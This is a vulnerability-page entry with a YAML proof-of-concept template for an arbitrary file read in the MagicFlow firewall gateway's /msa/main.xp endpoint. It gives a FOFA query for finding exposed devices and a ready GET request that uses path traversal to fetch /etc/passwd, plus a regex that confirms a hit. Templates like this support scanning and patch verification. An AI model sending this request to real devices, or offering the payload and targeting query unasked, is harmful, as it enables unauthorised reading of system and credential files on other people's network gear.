magicflow-main-xp-file-read: MagicFlow 防火墙网关 main.xp 任意文件读取漏洞

2025-08-01 MagicFlow防火墙网关 PoC Public

Description

MagicFlow 防火墙网关 main.xp 存在任意文件读取漏洞,攻击者通过构造特定的Url获取敏感文件

fofa: app="MSA/1.0"

PoC

id: magicflow-main-xp-file-read

info:
  name: MagicFlow 防火墙网关 main.xp 任意文件读取漏洞
  author: zan8in
  severity: high
  description: |-
    MagicFlow 防火墙网关 main.xp 存在任意文件读取漏洞,攻击者通过构造特定的Url获取敏感文件
    fofa: app="MSA/1.0"
  tags: magicflow,file-read
  created: 2025/03/27

rules:
  r0:
    request:
      method: GET
      path: /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../etc/passwd
    expression: response.status == 200 &&  "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities